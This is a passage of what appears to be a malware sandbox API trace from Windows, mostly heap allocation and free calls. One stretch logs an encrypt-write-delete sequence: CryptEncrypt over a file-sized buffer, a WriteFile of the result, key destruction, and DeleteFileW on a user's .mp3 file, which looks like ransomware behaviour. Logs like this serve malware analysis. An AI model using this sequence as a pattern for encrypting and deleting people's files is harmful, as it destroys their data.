hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.366] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0116.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.367] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.367] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0670 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0468 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0288 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d06c0 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.369] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.374] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb060, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.442] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x17256, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x17260) returned 1 [0116.442] CharLowerBuffW (in: lpsz="byte[94817]", cchLength=0xb | out: lpsz="byte[94817]") returned 0xb [0116.446] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb1e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.446] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1268*, pdwDataLen=0x144e088*=0x17256, dwBufLen=0x17260 | out: pbData=0x49b1268*, pdwDataLen=0x144e088*=0x17260) returned 1 [0116.447] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.448] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x17260, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x17260, lpOverlapped=0x0) returned 1 [0116.451] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0116.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cab38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0116.452] CryptDestroyKey (hKey=0x41ac780) returned 1 [0116.452] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.452] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0116.452] CryptReleaseContext (hProv=0x41a4d00, dwFlags=0x0) returned 1 [0116.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.452] FreeLibrary (hLibModule=0x756e0000) returned 1 [0116.452] CloseHandle (hObject=0x298) returned 1 [0116.453] CloseHandle (hObject=0x258) returned 1 [0116.462] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3", lpFilePart=0x0) returned 0x47 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0116.462] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\hkfndv.mp3")) returned 0x20 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0116.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0116.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0116.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0116.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0116.463] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f501380, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xab2dfb80, ftLastAccessTime.dwHighDateTime=0x1d5ef2a, ftLastWriteTime.dwLowDateTime=0xab2dfb80, ftLastWriteTime.dwHighDateTime=0x1d5ef2a, nFileSizeHigh=0x0, nFileSizeLow=0x17256, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HkFnDV.mp3", cAlternateFileName="")) returned 0x41ac540 [0116.463] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\hkfndv.mp3")) returned 1 [0116.521] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f501380, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xab2dfb80, ftLastAccessTime.dwHighDateTime=0x1d5ef2a, ftLastWriteTime.dwLowDateTime=0xab2dfb80, ftLastWriteTime.dwHighDateTime=0x1d5ef2a, nFileSizeHigh=0x0, nFileSizeLow=0x17256, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HkFnDV.mp3", cAlternateFileName="")) returned 0 [0116.521] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0116.526] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0116.526] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0116.526] HeapFree (in: hHeap=0x1780000, 